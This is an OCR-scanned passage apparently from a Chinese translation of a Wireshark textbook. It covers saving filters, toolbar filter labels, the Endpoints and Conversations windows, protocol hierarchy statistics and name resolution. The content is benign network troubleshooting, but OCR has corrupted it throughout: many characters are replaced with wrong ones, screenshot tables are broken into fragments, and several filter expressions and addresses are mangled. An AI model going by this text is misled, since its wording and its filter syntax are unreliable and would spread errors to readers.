smtp || pop || imap 文本 email 流 量 (SMTP、POP 或 IMAP ) 


4.5.3 ”保存 过 滤 硕 规则 





在 创建 了 很 多 捕获 和 显示 过 小 天 之 后 ， 你 会 友 现 其 中 有 一 些 你 使 用 
得 格外 频 索 。 这 时 你 并 不 需要 在 每 次 使 用 它们 的 时 候 都 重新 输入 ， 
Wireshark 可 以 让 你 把 常用 的 过 小 颖 规则 保存 下 来 ， 供 以 后 使 用 。 想 要 你 
存 一 个 目 定 义 的 捕获 过 小 右 规 则 ， 可 以 按照 如 下 步 又 操作 。 
(1) 选择 Capture -> Capture Filters 打 开 Capture Filter 对 话 框 。 
(2) 在 对 话 框 的 左边 单 击 〈+) 按钮 ， 创 建 一 个 新 的 过 小 器 。 
(3) 在 Filter Name 框 中 给 你 的 过 涛 需 起 一 个 名 字 。 
(4) 在 Filter String 框 中 输入 实际 的 过 滤 亏 表达 式 。 
(5) 单 击 OK 按钮 ， 将 你 的 过 滤 医 表达 式 你 存 到 列表 中 。 
按照 如 下 步 又 保存 一 个 目 定 义 的 显示 过 小 右 规 则 。 


(1) 在 主 窗 口 的 过 小 条 栏 里 输入 你 的 过 滤 表 达 式 ， 然 后 早 击 左边 
的 市 状 按钮 。 


(2) 单 击 你 存 这 个 过 滤 俐 选项 ， 然 后 束 会 弹出 一 个 有 看 之 前 你 存 
过 的 所 有 显示 过 滤 费 列表 的 对 话 框 。 在 这 里 你 可 以 给 你 的 过 滤器 起 名 ， 
最 后 单 击 OK 来 剑 存 〈“ 见 图 4-18) 。 


是 Wireshark . Display Filters 


Mame Filter 
Ethernet address O000:5e:00:53:00 eth.addr == 0000oe005300 
Ethernet type Da0806 (ARP) eth,type == (ho0806 
Ethernet broadcast eth.addr == 于 : 邮 : 寿 : 开 : 寿 : 酝 
No ARP not arp 
[Psd only I 
IPyd address 192,0,2,1 ip.addr== 192.0.2.1 
IPwd address isn't 192.0.2.1 tdon't use != for this!} ltip.addr == 192,0.2.,1) 
[Pw only Ipwe 
[Pw6 address 2001:dbe::1 ipvb.addr == 2001:db8::1 

Ipx 

tecp 

udp 

ltudp.part == 53 || tcp,port == 53) 
TCP or UDP port is 2W0 (HTTP) tcp,pori == 0 || udp.port == WW 
HTTR http 
No ARP and no DNS not arpand ltudp.port == 53) 
Non-HTTP and non-SMTP toyfrom 192.0,2.,1 ip.addr== 192,0.2,1 and mottcp,port in {80 25} 
DNS Server ip.addr== 1.2,34 





oe | cane 





图 4-18 ”你 可 以 直接 从 主 工具 柱 里 保存 显示 过 小 右 


4.5.4 在 工具 栏 中 增加 显示 过 滤器 


如 果 你 有 一 些 经 币 用 的 过 小 需 ， 那 么 不 妨 把 过 滤 亏 切换 添加 到 包 列 
ta 厂 术 中 ， 这 样 方便 你 去 调用 。 要 实现 这 个 功能 ， 请 依照 下 
列 步骤 操 


(1) 在 显示 过 小 需 的 条 框 里 键入 表达 式 ， 然 后 单 击 在 条 框 右面 的 
(+) 按钮 。 


(2) 一 个 新 的 条 框 会 在 下 方 出 现 ， 这 时 在 Label 区 框 里 键入 过 滤器 
的 名 子 《 见 图 4-19)〉 。 以 该 名 字 生 成 的 标 釜 将 会 在 工具 栏 里 代表 这 个 过 
渤 器 。 最 后 单 击 OK， 就 可 以 把 代表 这 个 表达 达 式 的 快捷 标签 加 入 工具 


顾 http_google.pcap 








.flags.reset == 
Filter Expression Preferences... Label: |TCP RST Fiter: tcp.flags.reset == 1 





图 4-19 ”在 过 滤 工 具 柱 中 增加 过 滤 表 达 式 标签 


签 ， 按 


如 图 4-20 所 示 ， 我 们 已 经 在 过 滤 工 具 栏 里 制作 了 一 个 快捷 标签 ， 
下 便 可 以 迅速 过 滤 出 所 有 带 RST 标 志 位 的 TCP 包 。 就 像 第 3 章 介 绍 的 那 
样 ， 这 些 额 外 的 快捷 标签 会 保存 在 你 个 人 的 配置 文档 里 。 这 个 强大 的 功 
能 极 大 地 增强 了 你 在 不 同 抓 包 场 景 下 找 出 问题 的 能 力 。 





帮 tcp_refuseconnec tion.pcap 
File Edt View Go 
经 轩 阳 | 对 马 空 全 名 县 虑 
3 eset == 





图 4-20 ”使 用 快捷 标签 来 过 滤 


Wireshark 内 置 的 许多 过 滤 需 可 以 作为 过 滤器 规则 范例 。 你 在 创建 目 
己 的 过 滤 峰 时， 可 能 会 用 到 它们 《可 参考 Wireshark 帮 助 页 面 ) 。 我 们 在 
整 本 书 的 例子 中 都 会 用 到 过 滤 夫 。 





[1] ”Update list of packets in real time: 实时 更 新 数据 包 列 表 ; Automatic 
scrolling in live capture: 在 当前 捕获 中 进行 目 动 滚动 。 主 者 注 





第 5 瘟 ”Wireshark 高 级 特性 





在 掌握 了 Wireshark 的 基础 知识 之 后 ， 下 一 步 便 是 仔细 钻研 它 的 分 析 
和 图 形 化 功能 了 。 在 这 一 章 中 ， 我 们 将 会 从 这 些 强 大 的 功能 特性 中 挑选 
一 些 进 行 介 绍 ， 其 中 包括 端点 和 会 话 窗口 、 名 称 解 析 的 细节 、 协 议 解 
析 、 数 据 流 跟踪 、IO 图 形 化 等 。 这 些 独 特 的 图 形 功 能 在 分 析 的 不 同 阶段 
是 非常 有 用 的 。 在 开始 学 习 本 章 之 前 ， 请 确保 至 少 答 试 使 用 这 里 列 出 的 
所 有 功能 ， 因 为 我 们 将 会 在 本 书 其 余 章节 中 频 索 地 使 用 它们 。 


5.1 端点 和 网 络 会 话 


要 想 让 网 络 通 信 正 党 进行 ， 你 必须 至 少 拥 有 两 台 设 备 进 行 数据 流 的 
交互 。 关 点 (endpoint) 束 是 指 网 络 上 能 够 发 送 或 者 接收 数据 的 一 台 设 
备 。 两 个 疹 点 之 间 的 通信 被 称 乙 为 会 话 (conversation) 。Wireshark 根 
据 交 互 的 特性 来 标识 闹 点 会 话 ， 特 别 是 在 多 种 协议 之 间 所 使 用 的 地 址 。 


闹 点 在 OSI 的 个 同 层级 上 使 用 多 种 不 同类 型 的 地 址 。 例 如 在 数据 链 
路 层 ， 通 信使 用 物理 网 卡 的 MAC 地 址 。 每 个 设备 的 MAC 地 址 独一无二 
(虽然 也 有 办 法 修改 ， 但 这 可 能 会 削弱 它 的 唯一 性 ) 。 然 而 在 网 络 层 ， 
闹 点 使 用 IP 地 址 。IP 地 址 可 以 在 任何 时 间 修 改 。 我 们 将 在 接 下 来 的 章 市 
里 讨论 这 些 地 址 类 型 是 怎么 使 用 的 。 


图 5-1 展 示 了 地 址 是 如 何 标 识 端 点 的 两 个 例子 。 图 中 会 话 A 阐 释 了 数 
据 链 路 〈MAC ) 层 的 两 个 闪 点 之 间 的 通信 。 关 点 A 的 MAC 地 址 是 
00:ff:ac:ce:0b:de， 病 点 B 的 MAC 地 址 是 00:ff:ac:e0:dc:0f。 人 会话 B 曾 释 了 工 
作 在 网 络 (IP〉 层 的 两 个 设备 之 间 的 退 信 。 闹 点 A 的 JP 地 址 是 


192.168.1.25。 闹 点 B 的 IP 地 址 是 192.168.1.30。 


会 话 A 
端点 A 中 痛 点 B 
La i aa 


O00:ff:ac:ce:Ob:de O00:ff:ac:eO:dc:0Of 


会 话 B 
并 扣 人 





| 多 168.125 192.168 130 
图 5-1 ”网络 上 的 端点 和 会 话 


现在 让 我 们 来 看 一 看 Wireshark 如 何在 冰点 层面 或 会 话 层 面 上 提供 网 
络 通信 的 相关 信息 。 


5.1.1 村 看 问 点 统计 


当 分 析 流 量 时 ， 你 也 许 会 察觉 到 可 以 将 问题 定位 到 网 络 中 的 一 个 特 
定 交点 上 去 。 举 例 来 说 ， 依 次 打开 捕获 文件 Jotsofweb.pcapng 和 Wireshark 
的 Endpoints 窗 口 〈Statistics->Endpoints) 。 这 个 窗口 给 出 了 各 个 端点 的 
许多 有 用 的 统计 数据 ， 如 图 5-2 所 示 ， 包 括 每 个 问 点 的 地 址 、 传 输 发 壕 
数据 包 的 数量 和 字 市 数 。 


这 个 窗口 顶部 的 选项 卡 《TCP、Ethernet、IPV4、IPV6 和 UDP) 根据 
协议 将 当前 捕获 文件 中 所 有 文 持 和 被 识别 的 六 点 进行 分 类。 单 击 其 中 一 
个 选项 卡 ， 束 可 以 只 显示 针对 一 个 具体 协议 的 问 点 。 早 击 窗口 右 下 角 的 
EndpointTypes 多 选 枉 ， 束 可 以 添加 额外 的 协议 过 滤 标 丛 。 勾 选 Name 
resolution 多 选 枉 ， 可 以 开局 名 称 解 析 功 能 来 答 看 端点 地 址 。 如 果 你 在 处 
理 大 流量 且 需 要 过 滤 出 所 显示 的 内 点 数据 ， 那 么 你 可 以 事先 在 Wireshark 
主 窗口 里 应 用 显示 过 涛 部， 然后 在 痪 氮 窗口 勺 选 Limit to display filter 多 
选 枉 。 这 个 选项 会 让 闪 点 窗口 只 显示 与 显示 过 滤 需 相 匹 配 的 端点 。 


题 Wireshark ,Endpoints ,lotsofweb 


TCP "358 Ethernet * 12 IPw4 " 95 IPw 扣 "5 UDP "1o6 


Packets Bytes Packets A—B BytesA—=B Packets 日 一 由 BytesB 一 由 Latitude Longitude 入 
342 342 0 0 - - 
11k 275 32 4151 - 
26] 174 87 - 

291k 26k - 

387 854 - 

1321 2007 - 

3737 | 1016 - 

3332 2051 - 

Pad 1343 - 

9347 1241 - 

2043 4118 - 

64.208.21.17 0 2781 1295 1486 - 

G4.208.21,43 357 kk 0 280 k mk- 

65.173.218.96 473 331k 305k 25k - 

66.35.45.201 06 207k Oak 104k - 
66.227.17.18 1l2k 8577 3990 - 
66.235,142,3 0 2285 853 1432 - 
66.235,143,34 3217 ! 1373 364 - 
66.235.143,.121 0 3234 1490 1744 - 
67.192.232,2 38056 | 6456 1600 - 


[|] Name resolution [| Limit to display filter Endpoint Types 


Close Help 


Ln 
lnb -lk 


4.23.40,.126 318 Kk 
8.18.91,65 1241 
8.18.95.169 3328 
12.120,.63.24 4753 
12.129.199.110 0 5383 
G3.215.202,16 ' 2069 
64.4.22.46 10k 
64.191.203.30 ?061 


Fo 


[| 








图 5-2 ”冰点 窗口 可 以 让 你 得 看 一 个 捕获 文件 里 的 每 个 痕 点 


男 一 个 便利 的 功能 束 是 你 可 以 使 用 六 点 窗口 将 特定 的 数据 包 过 小 出 
来 ， 使 其 显示 在 Packet List 面 板 中 。 这 是 快速 锁定 某 个 闹 点 相关 数据 包 
的 方法 。 碳 键 单 击 一 个 特定 的 病 点 ， 可 以 看 到 许多 选项 ， 包 括 创 建 过 滤 
癸 以 显示 只 与 这 个 端点 关联 的 流量 ， 或 者 与 选 定 问 点 无 天 的 所 有 流量 。 
你 还 可 以 在 下 拉 某 单 里 选择 着 色 (Colorize〉 选项 ， 这 会 直接 把 当前 端 
点 地 址 转化 为 一 条 着 色 规 则 (着色 规 则 在 第 4 章 有 所 讨论 ) 。 用 这 种 方 
法 ， 你 可 以 批量 高 亮 与 一 个 器 点 有 关 的 包 ， 以 便于 你 在 后 续 分 析 中 可 以 
很 快 地 定位 到 它们 。 


5.1.2” 舍 看 网 络 会 话 


打开 lotsofweb.pcapng 后 ， 访 问 Wireshark 的 会 话 窗 口 (Statistics- 
>Conversations) 来 显示 所 有 在 捕获 文件 中 的 会 话 ， 如 图 5-3 所 示 。 会 话 
窗口 和 六 点 窗口 看 起 来 很 像 ， 但 会 话 窗口 展示 的 是 一 行 两 个 地 址 组 成 的 
会 话 ， 以 及 每 个 设备 发 运 或 收 到 的 数据 包 和 衬 廊 数 。 地 址 A 列 代 表 看 源 
疹 点 ， 地 址 B 列 代表 痢 目的 冰点 。 

















帮 Wireshark . Conversations . lotsofweb 过 口 xX 
Ethernet * 13 IPv4 ' 103 IPv6 * 4 TO "279 UDP * 93 
Plies A Address B Packets Bytes PacketsA—B BytesA—B PacketsB—A BytesB—A RelStart Duration Bits/sA—B Bits/sB 一 A 六 
0.0.0.0 255.255.255.255 1 342 1 342 0 0 82.137333000 0.000000 N/A N/A 
4.2.2.1 172.16.16.128 16 2101 8 1433 8 668 3.009402000 36.237044 316 147 
4.2.2.1 172.16.16.197 61 6699 30 4206 31 2493 16.331275000 58.485202 575 341 
4.2.2.1 172.16.16.136 26 2626 13 1636 13 990 27.106391000 33.836085 386 234 
4.2.2.2 172.16.16.197 2 261 1 174 1 87 23.098007000 0.023047 60k 30k 
4.23.40.126 172.16.16.197 451 318k 234 291k 217 26 Kk 73.085870000 13.245934 176k 16k 
8.18.91.65 172.16.16.128 9 1241 3 387 6 854 3.243355000 63.289076 48 107 
8.18.95.169 172.16.16.197 18 3328 1321 11 2007 17.862227000 56.918573 185 282 
12.120.63.24 172.16.16.128 13 4753 6 3737 7 1016 8.836392000 69.578042 429 116 
12.129.199.110 172.16.16.197 20 5383 8 3332 12 2051 74.806613000 11.541974 2309 1421 
63.215.202.16 172.16.16.128 7 2069 2 724 - 1345 6.684163000 61.630220 93 174 
64.4.22.46 172.16.16.128 16 10k 10 9347 6 1241 6.681906000 12.392572 6033 801 
64.191.203.30 172.16.16.136 18 7061 6 2943 12 4118 60.393104000 3.054116 7708 10k 
64.208.21.17 172.16.16.128 10 2781 5 1295 5 1486 8.800115000 0.232560 44k 5 
64.208.21.43 172.16.16.128 551 357k 309 280 k 242 Tk 6.085472000 72.329769 31k 8523 
65.173.218.96 172.16.16.136 473 331k 263 305 k 210 25 k 59.432328000 27.290208 89 k 7497 
66.35.45.201 172.16.16.136 1,106 807k 596 702k 510 104 k 10.306330000 83.442116 67 Kk 10k 
66.227.17.18 172.16.16.197 56 12k 28 8577 28 3990 17.882206000 50.526514 1358 631 
66.235.142.3 172.16.16.197 10 ”2285 4 853 6 1432 17.860779000 0.245516 27k 46k 
66.235.143.54 172.16.16.128 16 5217 7 1573 9 3644 4.475410000 15.134210 831 1926 
66.235.143.121 172.16.16.197 10 3234 5 1490 5 1744 73.279308000 9.893837 1204 1410 Y 
六] Name resolution [DD Limit to display filter 
Copy | IFolow Stream... Graph... Close Help 








图 5-3 


会 话 窗口 可 以 让 你 与 捕获 文件 中 的 每 个 会 话 进行 区 互 


个 窗口 中 列 出 的 会 话 以 不 同 的 协议 分 开 。 要 查看 针对 一 个 协议 的 

人 证 ， 可 单 击 其 中 一 个 窗口 顶部 的 选项 卡 进行 切换 或 者 在 右 下 角 增 加 一 

其 他 的 协议 类 型 。 就 像 在 端点 窗口 里 的 操作 一 样 ， 你 可 以 使 用 名 称 解 

析 、 通过 显示 过 滤器 限制 可 见 会 话 、 右 键 单 击 一 个 特定 的 会 话 ， 来 创建 

基于 该 会 话 的 过 小 大 。 基 于 会 话 的 方式 来 过 滤 流 量 可 以 帮助 你 深入 研究 
一 些 有 趣 的 交互 序列 中 的 细节 。 


5.1.3 ”使 用 痕 点 和 会 话 定 位 最 高 用 量 者 


靖 点 和 会 话 窗 口 是 排查 网 络 问题 的 得 力 助手 ， 
网 络 中 产生 各 大 流量 的 源头 时 。 


在 : 夺 拿 lotsofweb. pcapng 来 人 举例， 就 像 文 件 名 所 揭示 的 那样 ， 该 捕获 
文件 含有 多 个 客户 疹 浏 览 互联 网 时 产生 的 大 量 HTTP 流 量 。 图 5-4 显 示 了 
在 这 个 捕获 文件 中 以 字 节 数目 排序 的 端点 列表 。 


你 可 以 注意 到 : 以 字 节 数 排序 后 的 第 一 个 地 址 是 172.16.16.128 本 地 
地 址 ， 这 是 一 个 内 网 地 址 〈 我 们 会 在 第 7 章 讲 到 如 何 区 分 ) 。 除 此 之 
da 莉 有 这 个 地 址 的 设备 是 数据 集中 最 活跃 的 信息 源 《 进 行 了 最 多 通 通信 

主机 ) 。 


特别 是 当 你 试图 寻找 





题 Wireshark ,Endpoints . lotsofweb 
































| Pv4'95 | Ethemet' 人 2 | PPv6 .5 | TOP 3 | Wop:106| 


| Address Packets Bytes Packets 丰 一 BytesAmB PacketsB—A Bytes 日 一 真 Latitude 
| 172.16.16.128 B324 7387 k Di k 35334 bar9k - 
|74.125.103.163 3,927 4232k 4173 k 1045 58k - 
| 172.16.16.136 2,349 1433 k 213k 1212 1241k - 
172.16.16.197 2,157 1073k 221k 1050 851k - 
| 66.35.45.a01 1106 207k ?O02 k 510 104k - 
?4.125.103.147 G33 kK baD k 173 12k - 
?4.125.166.28 332 k 519 k 171 13k - 
可 ,1235.95,.149 409k 365 Kk 43Kk - 
G4.208,.21.43 357 k 280 k Tk- 
65,.173.218.96 331k 305k 25k - 
4.23.40,126 318k 291k 26k - 
|a09.85.225.165 292 k 282 k 10k 
205.203.140,65 251k 179 k 2k 
204.160.126.126 185 k 118 k 6k - 
204.160.104.126 149 k 235k Ak 
[72.32.92.4 130 k ork 32k 


|_ fi DD Limit to display filter 这 







































































图 5-4 ”交点 窗口 显示 了 哪个 主机 是 最 高 用 量 者 


第 二 个 地 址 74.125.103.163 是 一 个 公 网 地 址 。 当 你 对 一 个 公 网 地 址 
一 无 所 知 时 ， 可 以 使 用 WHOIS 来 查询 它 的 注册 者 。 在 这 个 例子 中 该 地 
址 属于 Google， 如 图 5-5 所 示 。 


Net Range TAT12500-74125.255.255 
CIDR A125.0 016 
Name GOOGLE 

Handle NET-74-125-0-0-1 
Parent 

Net TYpe 

Drigin AS 

Organization 

Registration Date 2007-03-13 

Last Updated 2012-02-24 
Comments 

RESTfuI Link 

人 See AlSo 


See BASo 





图 5-5 WHOIS 查 询 结 果 显 示 74.125.103.163 指 向 谷歌 








有 了 这 些 信 息 ， 你 可 以 假设 : 74.125.103.163 和 172.16.16.128 正 在 各 
目 与 很 多 其 他 设备 进行 大 量 通 信 ， 或 者 这 两 个 IP 之 间 在 彼此 通信 。 实 际 
上 上 ， 最 大 用 量 者 之 间 的 端点 通信 是 比较 常见 的 。 要 确认 这 一 点 ， 请 打开 
会 话 窗 口 并 选中 IPv4 选 项 卡 ， 你 就 可 以 通过 使 用 字 节 数 对 列表 进行 排序 
来 验证 这 一 点 。 在 这 个 例子 中 ， 你 可 以 看 到 这 个 流量 应 该 是 连续 的 视频 
下 载 流 量 ， 因 为 从 地 址 A(74.125.103.163) 发 出 的 数据 包 比 从 地 址 
B(172.16.16.128) 友 出 的 要 大 得 多 ， 如 图 5-6 所 示 。 


顾 Wireshark . Conversations . lotsofweb 


Ethernet * 13 IPv4 * 103 IPv6 ' 4 下 UDP ' 93 


Address A Address B Packets Bytes Packets A—B ByesA—B PacketsB—A BytesB—A RelStat Duration 但 
74.125.103.163 172.16.16.128 3.927 4232 k 4173 k 58 k 39.247091000 54,307799 
66.35.45.201 172.16.16.136 1,106 807k 702k 104 k 10.306330000 83.442116 
74.125.103.147 172.16.16.128 608 633k 12k 9.966132000 7.539890 

172.16.16.128 553 532k 13k 3.242550000 38.430937 

172.16.16.128 551 357k Tk 6.085472000 72.329769 

172.16.16.136 473 331k 25 k 59.432328000 27.290208 
74.125.95.149 172.16.16.128 415 323k 33 k 3.243592000 80.884280 
4.23.40.126 172.16.16.197 451 318k 26k 73.085870000 13.245934 
172.16.16.128 209.35.225.165 274 288k 280 k 4.385288000 48.369102 
172.16.16.128 “205.203.140.65 363 251k 179k 1.709231000 76.713264 
172.16.16.197 204.160.126.126 449 185k 118 k 16.497508000 69.835435 
172.16.16.128 204.160.104.126 327 149k 85k 3.317246000 11.191162 
72.32.92.4 172.16.16.136 387 130k 32 上 14.245523000 36.732188 w 
< 
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图 5-6 会话 窗口 确认 这 两 个 最 高 用 量 者 之 间 有 交互 


你 可 以 通过 以 下 显示 过 滤 表 达 式 来 检 梧 这 个 会 话 : 





ip.addr == 74.125.163.163 && ip.addr == 172.16.16.128 


如 果 往 下 翻 这 个 列表 ， 那 么 你 将 会 在 Info 列 看 到 一 些 到 域名 为 
youtube.com 的 DNS 请 求 。 这 和 我 们 之 前 所 得 草 的 74.125.103.163 属 于 
Google 是 相符 的 ， 因 为 YouTube 属 于 Google。 


在 此 书后 面 的 实战 场景 中 ， 你 还 会 看 到 如 何 使 用 病 点 和 会 话 窗 口 。 


5.2 基于 协议 分 层 结构 的 统计 


当 在 与 未 知 的 捕获 文件 打交道 时 ， 有 时 需要 知道 文件 中 协议 的 分 布 
情况 ， 也 就 是 捕获 中 TCP、IP、DHCP 等 所 占 的 百分比 是 多 少 。 除 了 计 
算 并 汇总 数据 包 之 外 ， 使 用 Wireshark 的 Protocol Hierarchy Statistics 〈 协 
议 分 层 统计 ) 窗口 也 是 一 个 对 你 的 网 络 进行 基准 分 析 的 好 方法 。 


举例 来 说 ， 保 持 lotsofweb.pcapng 文 件 打开 并 且 清 除 之 前 的 过 滤 需 ， 
选择 Statistics->Protocol Hierarchy 打 开 协 议 分 层 统计 窗口 〈 见 图 5-7) 。 








帮 Wireshark .Protocol Hierarchy Statistics . lotsofweb 口 X 
Protocol | Percent Packets Packets Percent Bytes Bytes Bits/s End Packets End Bytes End Bits/s 
YY Frame 100.0 12899 100.0 9931436 847k 0 0 0 

Y _ Ethernet 100.0 12899 100.0 9931436 847k 0 0 0 
Y_ Internet Protocol Version 6 0.2 32 0.1 5020 428 0 0 0 
YY User Datagram Protocol 0.2 32 0.1 5020 428 0 0 0 
Link-local Multicast Name Resolution 0.2 28 0.0 2408 205 28 2408 205 
DHCPYv6 0.0 2 0.0 08 26 2 308 26 
Dat 0.0 2 0.0 2304 196 2 2304 196 
Y Internet Protocl| Version 4 99.7 12861 99.9 9926164 847k 0 0 0 
Y _ User Datagram Protocol 214 0.3 28932 2468 0 0 0 
Simple Network Management Protocol 0.0 一 0.0 476 40 4 476 40 
Service Location Protocol 0.0 1 0.0 86 . 1 86 7 
NetBIOS Name Service 0.3 43 0.0 3956 337 43 3956 337 
Multicast Domain Name System 0.0 6 0.0 800 68 6 800 68 
Link-local Multicast Name Resolution 0.2 28 0.0 1848 157 28 1848 157 
Hypertext Transfer Protocol 0.2 25 0.1 9395 801 25 9395 801 
Domair Name System 0.8 105 0.1 11687 997 105 11687 997 
Bootstrap Protocol 0.0 2 0.0 684 58 2 684 58 
Y Transmissicn Control Protocol 98.0 12645 99.7 9897140 844k 10905 8908786 760k 
Secure Sockets Layer 0.0 1 0.0 103 8 1 103 8 
Malformed Packet 0.0 3 0.0 4380 373 3 4380 373 
Y Hypertext Transfer Protocol 13.5 1736 9.9 983871 83k 1364 723402 61k 
Y Portable Network Graphics 0.1 17 0.1 10816 922 16 10469 893 
Malformed Packet 0.0 1 0.0 347 29 1 347 29 
Media Type 0.2 28 0.2 19284 1645 28 19284 1645 
Malformed Packet 0.0 1 0.0 314 26 1 314 26 
Line-based text dat 1.1 145 1.0 103728 8851 145 103728 8851 
JPEG File Interchange Format 0.6 72 0.6 62036 5293 72 62036 5293 
JavaScript Object Notation 0.0 3 0.0 2843 242 3 2843 242 
eXtensible Markup Language 0.1 11 0.1 5946 507 11 5946 507 
Compuserve GIF 0 95 0.6 55502 4736 95 55502 4736 
Internet Group Management Protocol 0.0 2 0.0 92 7 2 92 7 
Address Resolution Protocol 0.0 6 0.0 252 21 6 252 21 
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图 5-7 ”协议 分 层 统计 窗口 给 出 了 各 种 协议 的 分 布 统 计 情 况 


协议 分 层 统计 窗口 束 像 一 张 快照 ， 会 让 你 直观 地 看 到 网 络 活 动 中 的 
各 种 类 型 。 在 图 5-7 中 ， 以 太 网 流量 占 100%，IPv4 流 量 占 99.79%6，TCP 流 
量 占 98%， 来 自 网 页 浏览 的 HTTP 流 量 占 13.5%。 这 些 信息 给 我 们 提供 了 
一 个 很 好 的 测试 网 络 的 方式 ， 特 别 是 当 你 在 脑海 中 对 网 络 流量 退 常 是 什 
么 样子 有 了 大 任 的 印象 后 。 举 个 例子 ， 假 设 在 正常 情况 下 你 的 网 络 流 量 
有 10% 是 ARP 流 量 ， 但 在 最 近 的 一 次 捕获 中 发 现 有 50% 的 ARP 流 量 ， 你 
就 可 以 推断 也 许 哪 里 出 问题 了 。 在 一 些 情况 下 ， 一 种 很 少见 的 协议 出 现 
在 流量 中 也 比较 有 趣 。 如 果 你 没 去 设置 使 用 生成 树 协议 (STP)》 的 设备 
但 又 在 协议 分 层 统计 中 看 到 STP 流 量 ， 这 说 明 有 设备 设置 错误 。 


假 以 时 日 ， 你 就 可 以 通过 郁 看 正在 使 用 协议 的 分 布 情况 ， 来 得 到 网 


络 中 用 户 和 设备 的 情况 。 比 如 说 ， 当 你 看 到 高 HITP 流 量 时 ， 说 明 有 很 
多 网 页 浏 贤 在 进行 。 你 会 发 现 只 需要 价 早 地 但 看 网 段 中 的 流量 ， 束 可 以 
立即 分 辨 这 个 网 段 属于 哪个 部 门 。IT 部 门 网 段 的 流量 中 通常 包含 管理 协 
议 ， 例 如 ICMP 或 者 SNMP 的 数据 ， 订 单 管理 部 门 通常 会 导致 大 量 的 
SMTP 流 量 ， 甚 至 我 还 可 以 在 一 些 讨厌 的 实习 生 的 网 络 区 段 内 找到 他 们 
玩 麻 和 兽 世 界 的 流量 ! 


5.3 ”名称 解析 


网 络 数据 通过 使 用 各 种 字母 数字 组 成 的 寻 址 地 址 系统 进行 传输 ， 但 
这 些 地 址 系统 通常 都 因为 太 长 或 者 太 复 林 ， 而 不容 易 被 记 住 ， 比 如 物理 
便 件 地 址 00:16:CE:6E:8B:24。 名 称 解 析 ( 也 称 为 名 称 人 查询 〉 束 是 一 个 协 
议 用 来 将 一 个 独特 的 地 址 转换 到 男 一 个 的 过 程 ， 目 的 是 让 地 址 方便 记 
忆 。 举 例 来 说 ， 记 忆 google 的 域名 绝对 比 记 忆 216.58.217.238 快 得 多 。 我 
们 通过 关联 有 意义 的 名 称 与 神秘 的 地 址 ， 以 便 使 我 们 更 加 容易 记忆 和 识 


别 。 
5.3.1 开局 名 称 解 析 


Wireshark 在 显示 数据 包 时 ， 使 用 名 称 解 析 来 简化 分 析 。 要 局 用 这 项 
功能 ， 请 选择 Edit -> Preferences -> Name Resolution， 如 图 5-8 所 示 。 这 
里 有 一 些 Wireshark 名 称 解 析 的 主要 选项 。 


解析 MAC 地 址 (Resolve MAC addresses) : 这 种 类 型 的 名 称 解 析 
使 用 ARP 协 议 ， 试 图 将 第 2 层 一 数据 链 路 层 的 MAC 地 址 ， 例 如 
00:09:5B:01:02:03， 转 换 为 网 络 层 地 址 ， 例 如 10.100.12.1。 如 果 这 种 转 
换 尝 试 失败， 那么 Wireshark 会 使 用 程序 目录 中 的 ethers 艾 件 尝 试 进行 转 
换 。Wireshark 最 后 的 尝试 便 是 将 MAC 地 址 的 前 3 个 字 节 转换 为 设备 IEEFE 
指定 的 制造 商 名 称 ， 例 如 Netgear_01:02:03。 


解析 传输 名 称 (Resolve Transport name) : 这 种 类 型 的 名 称 解析 
答 试 将 一 个 端口 号 ， 转 换 成 一 个 与 其 相关 的 名 字 。 比 如 ， 将 交口 80 显 示 
为 http 。 当 你 磁 到 一 个 不 第 见 的 端口 而 又 不 知道 这 是 什么 协议 的 时 候 ， 
这 个 功能 显得 尤为 便利 。 





解析 网 络 名 称 (Resolve Network/IP name) : 这 种 类 型 的 名 称 解析 
试图 转换 第 3 层 一 一 网 络 层 的 地 址 ， 例 如 将 IP 地 址 192.168.1.50， 转 换 为 
一 个 易 读 的 域名 。 假 如 域名 具有 融 描 述 性 ， 则 对 我 们 理解 该 系统 的 目的 
或 其 所 有 者 ， 将 是 非常 有 帮助 的 。 


在 图 5-8 中 还 包括 其 他 几 个 有 用 的 选项 。 








Name Resolution 
Resolve MAC addresses 


Drs DL Resolve transport names 


LL | Resolve network (IP) addresses 
Use captured DNS packet data for address resolution 
Use an external network name resolver 


Enable concurren t DNS name resolution 





Maximum concurren trequests | 500 





[DL only use the profile "hosts” file 

[|] Enable OID resolution 

国 Suppress SMI errors 

SMI (MIB and PIB) paths Edit... 
SMI (MIB and PIB) modules Edit... 


GeoIP database directories Edit... 














图 5-8 在 Capture Options 对 话 框 中 开局 名 称 解析 。 前 3 项 中 只 有 MAC 地 址 解析 被 选中 了 


Use captured DNS packet data for address resolution: 从 已 捕获 的 
DNS 数 据 包 中 解析 出 了 IP 地 址 和 DNS 域 名 之 间 的 映射 。 


Use an external network name resolver: 人 允许 Wireshark 为 你 当前 的 
分 析 机 器 使 用 的 外 网 DNS 服务 器 生成 得 询 ， 从 而 获得 耻 地 址 和 DNS 域名 
之 间 的 映射 。 当 捕获 的 文件 里 没有 DNS 解析 数据 而 你 还 需要 DNS 域名 解 
析 时 ， 这 个 功能 就 比较 实用 了 了。 


Maximum concurrent requests: 该 参数 会 限制 当前 的 一 次 最 多 
DNS 请 求 数 量 。 当 你 的 捕获 文件 将 产生 大 量 的 DNS 碍 询 而 且 你 并 不 想 让 
DNS 答 询 占用 过 多 市 宽 的 时 候 ， 请 使 用 这 项 功能 。 


Only use the profile "hosts" file: 把 DNS 解析 限制 在 与 活动 
Wireshark 文 档 关 联 的 host 文 件 中 。 我 会 在 下 面 的 小 节 讲 到 如 何 使 用 这 个 


文件 。 


在 Preferences 中 所 修改 的 设置 ， 会 在 Wireshark 天 闭 并 重 局 后 生效 。 
要 和 想 让 名 称 解析 设置 立马 生效 ， 请 在 主 下 拉 有 单 的 View->Name 
Resolution 把 名 称 解 析 设 置 打 开 。 在 这 个 子玉 日 下 你 可 以 局 用 或 关闭 物 
理 、 传 输 、 网 络 地 址 的 名 称 解 析 。 


你 可 以 利用 各 种 名 称 解析 工具 使 你 的 捕获 文件 变 得 更 加 共有 可 读 
性 ， 从 而 在 一 些 情况 下 节省 大 量 时 间 。 举 例 来 说， 你 可 以 使 用 DNS 名 称 
解析 ， 来 轻松 地 识别 你 试图 精确 定位 为 特定 数据 包 许 的 计算 机 名 称 。 


5.3.2 名称 解析 的 洪 在 潍 病 


名 称 解 析 有 看 很 多 优 操 ， 使 用 名 称 解 析 看 上 去 很 容易 ， 但 是 也 存在 
着 一 些 潜在 的 弊端 。 首 先 ， 网 络 名称 解 析 可 能 会 失败 ， 尤 其 是 当 没 有 可 
